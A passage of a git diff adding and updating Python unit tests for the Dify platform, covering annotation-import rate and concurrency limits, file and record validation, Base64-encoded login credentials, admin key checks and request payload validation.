+ # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + assert "error_msg" in result + assert "malformed" in result["error_msg"].lower() + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ -322,7 +334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + """Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" + assert mock_recommended_app.position == 2 + + def test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 diff --git a/api/tests/unit_tests/controllers/service_api/app/test_chat_request_payload.py b/api/tests/unit_tests/controllers/service_api/app/test_chat_request_payload.py new file mode 100644 index 0000000000..1fb7e7009d --- /dev/null +++ b/api/tests/unit_tests/controllers/service_api/app/test_chat_request_payload.py @@ -0,0 +1,25 @@ +import uuid + +import pytest +from pydantic import ValidationError + +from controllers.service_api.app.completion import ChatRequestPayload + + +def test_chat_request_payload_accepts_blank_conversation_id(): + payload = ChatRequestPayload.model_validate({"inputs": {}, "query": "hello", "conversation_id": ""}) + + assert payload.conversation_id is None + + +def test_chat_request_payload_validates_uuid(): + conversation_id = str(uuid.uuid4()) + + payload = ChatRequestPayload.model_validate({"inputs": {}, "query": "hello", "conversation_id": conversation_id}) + + assert payload.conversation_id == conversation_id + + +def test_chat_request_payload_rejects_invalid_uuid(): + with pytest.raises(ValidationError): + ChatRequestPayload.model_validate({"inputs": {}, "query": "hello", "conversation_id": "invalid"}) diff --git a/api/tests/unit_tests/controllers/test_conversation_rename_payload.py b/api/tests/unit_tests/controllers/test_conversation_rename_payload.py new file mode 100644 index 0000000000..494176cbd9 --- /dev/null +++ b/api/tests/unit_tests/controllers/test_conversation_rename_payload.py @@ -0,0 +1,20 @@ +import pytest +from pydantic import ValidationError + +from controllers.console.explore.conversation import ConversationRenamePayload as ConsolePayload +from controllers.service_api.app.conversation import ConversationRenamePayload as ServicePayload + + +@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload]) +def test_payload_allows_auto_generate_without_name(payload_cls): + payload = payload_cls.model_validate({"auto_generate": True}) + + assert payload.auto_generate is True + assert payload.name is None + + +@pytest.mark.parametrize("payload_cls", [ConsolePayload, ServicePayload]) +@pytest.mark.parametrize("value", [None, "", " "]) +def test_payload_requires_name_when_not_auto_generate(payload_cls, value): + with pytest.raises(ValidationError): + payload_cls.model_validate({"name": value, "auto_generate": False}) diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py new file mode 100644 index 0000000000..40f58c9ddf --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_easy_ui_based_generate_task_pipeline.py @@ -0,0 +1,420 @@ +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest + +from core.app.apps.base_app_queue_manager import AppQueueManager +from core.app.entities.app_invoke_entities import ChatAppGenerateEntity +from core.app.entities.queue_entities import ( + QueueAgentMessageEvent, + QueueErrorEvent, + QueueLLMChunkEvent, + QueueMessageEndEvent, + QueueMessageFileEvent, + QueuePingEvent, +) +from core.app.entities.task_entities import ( + EasyUITaskState, + ErrorStreamResponse, + MessageEndStreamResponse, + MessageFileStreamResponse, + MessageReplaceStreamResponse, + MessageStreamResponse, + PingStreamResponse, + StreamEvent, +) +from 